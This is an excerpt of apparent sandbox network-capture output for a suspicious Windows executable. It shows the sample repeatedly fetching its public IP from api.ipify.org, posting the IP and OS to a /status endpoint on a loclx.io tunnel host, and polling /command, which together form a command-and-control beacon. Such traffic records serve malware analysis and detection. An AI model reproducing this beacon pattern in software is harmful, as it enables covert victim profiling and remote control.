Dec 11, 2024 11:30:41.419401884 CET	49927	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:41.419401884 CET	49927	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:41.419588089 CET	49927	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:41.420984030 CET	49933	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:41.538908958 CET	80	49927	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:41.540348053 CET	80	49933	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:41.540465117 CET	49933	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:41.549937010 CET	49933	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:41.669413090 CET	80	49933	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:42.778872013 CET	80	49933	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:42.778956890 CET	80	49933	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:42.779021978 CET	49933	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:42.779072046 CET	80	49933	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:42.779139996 CET	49933	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:42.779355049 CET	49933	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:42.898724079 CET	80	49933	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:47.785137892 CET	49948	80	192.168.2.5	104.26.12.205
Dec 11, 2024 11:30:47.904989004 CET	80	49948	104.26.12.205	192.168.2.5
Dec 11, 2024 11:30:47.905260086 CET	49948	80	192.168.2.5	104.26.12.205
Dec 11, 2024 11:30:47.905708075 CET	49948	80	192.168.2.5	104.26.12.205
Dec 11, 2024 11:30:48.025012970 CET	80	49948	104.26.12.205	192.168.2.5
Dec 11, 2024 11:30:48.996546984 CET	80	49948	104.26.12.205	192.168.2.5
Dec 11, 2024 11:30:48.996576071 CET	80	49948	104.26.12.205	192.168.2.5
Dec 11, 2024 11:30:48.996841908 CET	49948	80	192.168.2.5	104.26.12.205
Dec 11, 2024 11:30:48.996984959 CET	49948	80	192.168.2.5	104.26.12.205
Dec 11, 2024 11:30:48.997922897 CET	49950	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:49.117711067 CET	80	49948	104.26.12.205	192.168.2.5
Dec 11, 2024 11:30:49.117870092 CET	80	49950	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:49.117963076 CET	49950	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:49.118223906 CET	49950	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:49.238758087 CET	80	49950	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:49.238981962 CET	49950	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:49.358311892 CET	80	49950	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:50.358416080 CET	80	49950	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:50.358472109 CET	80	49950	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:50.358567953 CET	80	49950	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:50.358582973 CET	49950	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:50.358635902 CET	49950	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:50.358905077 CET	49950	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:50.360191107 CET	49956	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:50.478899956 CET	80	49950	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:50.479671001 CET	80	49956	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:50.479878902 CET	49956	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:50.480128050 CET	49956	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:50.599428892 CET	80	49956	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:51.724663973 CET	80	49956	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:51.724770069 CET	80	49956	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:51.724811077 CET	49956	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:51.724884987 CET	80	49956	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:51.724945068 CET	49956	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:51.725195885 CET	49956	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:51.844641924 CET	80	49956	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:56.738239050 CET	49971	80	192.168.2.5	104.26.12.205
Dec 11, 2024 11:30:56.857633114 CET	80	49971	104.26.12.205	192.168.2.5
Dec 11, 2024 11:30:56.857825041 CET	49971	80	192.168.2.5	104.26.12.205
Dec 11, 2024 11:30:56.858113050 CET	49971	80	192.168.2.5	104.26.12.205
Dec 11, 2024 11:30:56.977488041 CET	80	49971	104.26.12.205	192.168.2.5
Dec 11, 2024 11:30:57.964129925 CET	80	49971	104.26.12.205	192.168.2.5
Dec 11, 2024 11:30:57.964431047 CET	80	49971	104.26.12.205	192.168.2.5
Dec 11, 2024 11:30:57.964492083 CET	49971	80	192.168.2.5	104.26.12.205
Dec 11, 2024 11:30:57.964533091 CET	49971	80	192.168.2.5	104.26.12.205
Dec 11, 2024 11:30:57.965572119 CET	49976	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:58.084150076 CET	80	49971	104.26.12.205	192.168.2.5
Dec 11, 2024 11:30:58.085057020 CET	80	49976	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:58.085166931 CET	49976	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:58.096885920 CET	49976	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:58.216218948 CET	80	49976	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:58.216407061 CET	49976	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:58.335756063 CET	80	49976	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:59.324276924 CET	80	49976	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:59.324404001 CET	80	49976	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:59.324456930 CET	80	49976	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:59.324548006 CET	49976	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:59.324569941 CET	49976	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:59.324903011 CET	49976	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:59.326500893 CET	49978	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:59.444149971 CET	80	49976	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:59.445842028 CET	80	49978	167.99.38.229	192.168.2.5
Dec 11, 2024 11:30:59.445946932 CET	49978	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:59.446290970 CET	49978	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:30:59.565584898 CET	80	49978	167.99.38.229	192.168.2.5
Dec 11, 2024 11:31:00.681830883 CET	80	49978	167.99.38.229	192.168.2.5
Dec 11, 2024 11:31:00.681922913 CET	80	49978	167.99.38.229	192.168.2.5
Dec 11, 2024 11:31:00.681940079 CET	80	49978	167.99.38.229	192.168.2.5
Dec 11, 2024 11:31:00.682060957 CET	49978	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:31:00.682358980 CET	49978	80	192.168.2.5	167.99.38.229
Dec 11, 2024 11:31:00.801543951 CET	80	49978	167.99.38.229	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 11:28:58.472573042 CET	55698	53	192.168.2.5	1.1.1.1
Dec 11, 2024 11:28:58.613585949 CET	53	55698	1.1.1.1	192.168.2.5
Dec 11, 2024 11:28:59.842607021 CET	61853	53	192.168.2.5	1.1.1.1
Dec 11, 2024 11:29:00.392656088 CET	53	61853	1.1.1.1	192.168.2.5
Dec 11, 2024 11:30:03.239178896 CET	52017	53	192.168.2.5	1.1.1.1
Dec 11, 2024 11:30:03.679965019 CET	53	52017	1.1.1.1	192.168.2.5
Dec 11, 2024 11:30:38.315912962 CET	62176	53	192.168.2.5	1.1.1.1
Dec 11, 2024 11:30:38.452795029 CET	53	62176	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 11, 2024 11:28:58.472573042 CET	192.168.2.5	1.1.1.1	0xd643	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:28:59.842607021 CET	192.168.2.5	1.1.1.1	0x1a71	Standard query (0)	pepwuecibr.eu.loclx.io	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:30:03.239178896 CET	192.168.2.5	1.1.1.1	0x62f4	Standard query (0)	pepwuecibr.eu.loclx.io	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:30:38.315912962 CET	192.168.2.5	1.1.1.1	0xae4	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 11, 2024 11:28:58.613585949 CET	1.1.1.1	192.168.2.5	0xd643	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:28:58.613585949 CET	1.1.1.1	192.168.2.5	0xd643	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:28:58.613585949 CET	1.1.1.1	192.168.2.5	0xd643	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:29:00.392656088 CET	1.1.1.1	192.168.2.5	0x1a71	No error (0)	pepwuecibr.eu.loclx.io	eu.loclx.io		CNAME (Canonical name)	IN (0x0001)	false
Dec 11, 2024 11:29:00.392656088 CET	1.1.1.1	192.168.2.5	0x1a71	No error (0)	eu.loclx.io		167.99.38.229	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:30:03.679965019 CET	1.1.1.1	192.168.2.5	0x62f4	No error (0)	pepwuecibr.eu.loclx.io	eu.loclx.io		CNAME (Canonical name)	IN (0x0001)	false
Dec 11, 2024 11:30:03.679965019 CET	1.1.1.1	192.168.2.5	0x62f4	No error (0)	eu.loclx.io		167.99.38.229	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:30:38.452795029 CET	1.1.1.1	192.168.2.5	0xae4	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:30:38.452795029 CET	1.1.1.1	192.168.2.5	0xae4	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Dec 11, 2024 11:30:38.452795029 CET	1.1.1.1	192.168.2.5	0xae4	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

pepwuecibr.eu.loclx.io

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	172.67.74.152	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:28:58.776192904 CET	115	OUT	GET /?format=text HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: api.ipify.org Connection: close
Dec 11, 2024 11:28:59.841166019 CET	425	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 10:28:59 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8f04ca80fe1d0cc2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1494&min_rtt=1494&rtt_var=747&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 Data Ascii: 8.46.123.175

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:00.612281084 CET	171	OUT	POST /status HTTP/1.1 Content-Length: 39 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close Content-Type: application/json
Dec 11, 2024 11:29:00.735989094 CET	39	OUT	Data Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
Dec 11, 2024 11:29:01.844504118 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:29:01.844525099 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:01.987719059 CET	119	OUT	GET /command HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close
Dec 11, 2024 11:29:03.231303930 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:29:03.231328011 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	172.67.74.152	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:08.347069979 CET	115	OUT	GET /?format=text HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: api.ipify.org Connection: close
Dec 11, 2024 11:29:09.444174051 CET	426	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 10:29:09 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8f04cabcfc8b4229-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2302&min_rtt=2302&rtt_var=1151&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 Data Ascii: 8.46.123.175

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:09.566456079 CET	171	OUT	POST /status HTTP/1.1 Content-Length: 39 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close Content-Type: application/json
Dec 11, 2024 11:29:09.686248064 CET	39	OUT	Data Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
Dec 11, 2024 11:29:10.803586960 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:29:10.803620100 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49709	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:10.940543890 CET	119	OUT	GET /command HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close
Dec 11, 2024 11:29:12.177777052 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:29:12.177824020 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49714	172.67.74.152	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:17.311166048 CET	115	OUT	GET /?format=text HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: api.ipify.org Connection: close
Dec 11, 2024 11:29:18.416271925 CET	425	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 10:29:18 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8f04caf50904424c-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1552&rtt_var=776&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 Data Ascii: 8.46.123.175

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49715	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:18.538021088 CET	171	OUT	POST /status HTTP/1.1 Content-Length: 39 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close Content-Type: application/json
Dec 11, 2024 11:29:18.657406092 CET	39	OUT	Data Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
Dec 11, 2024 11:29:19.777371883 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:29:19.777470112 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49722	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:19.898974895 CET	119	OUT	GET /command HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close
Dec 11, 2024 11:29:21.139556885 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:29:21.139596939 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49739	172.67.74.152	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:26.279794931 CET	115	OUT	GET /?format=text HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: api.ipify.org Connection: close
Dec 11, 2024 11:29:27.468954086 CET	425	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 10:29:27 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8f04cb2d1b9342e1-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1584&rtt_var=792&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 Data Ascii: 8.46.123.175

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49740	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:29:27.589978933 CET	171	OUT	POST /status HTTP/1.1 Content-Length: 39 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close Content-Type: application/json
Dec 11, 2024 11:29:27.713669062 CET	39	OUT	Data Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
